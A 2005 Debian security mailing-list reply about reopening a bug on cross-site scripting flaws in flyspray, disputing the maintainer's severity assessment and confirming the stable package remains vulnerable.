[Secure-testing-team] Re: Bug#335997: flyspray: Multiple XSS vulnerabilities

[Thijs Kinkhorst]

reopen 335997
found 335997 0.9.7-2
thanks

Hello Pierre,

Sorry, didn't have time to get back to this earlier. I've verified that
unstable is indeed completely fixed for CVE-2005-3334 (which contains
some typos in the names of the affected variables).

> Though, please note that this XSS vulneratibility IS really minor : it 
> has to be created from a user that stole you a PHPSESSID, and made a 
> treacheous search, and force the user to use 'last search result' 
> *BEFORE* you do a new search yourself, which is *REALLY* unlikely. that 
> is not doable for anonymous users.

I don't subscribe to this assessment. This is a classic XSS, which can
be exploited as any other: trick the user in going to a specially
crafted URL and you can access his password cookie through JavaScript.
You don't need to steal anything or bring the system in a specific
state.

> I'll try to have a minimalist patch ASAP, but stable version is not 
> really based on the same code (I mean the version in unstable is quite 
> bigger) and I'm not sure a patch is that simple to transpose (you must 
> have seen that my patch was quite brutal : I escaped any POST-ed or 
> GET-et variable, which is most of the time OK, but which is not really 
> nice not "the right way" since it results in some entities showing up 
> in mails).

At least I can confirm that the stable version is still vulnerable to
this attack, it's easily reproducable. If you want I can look into
providing a patch or updated package. In any case, the bug should not
yet be closed.


bye,
Thijs
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20051231/223c22d6/attachment.pgp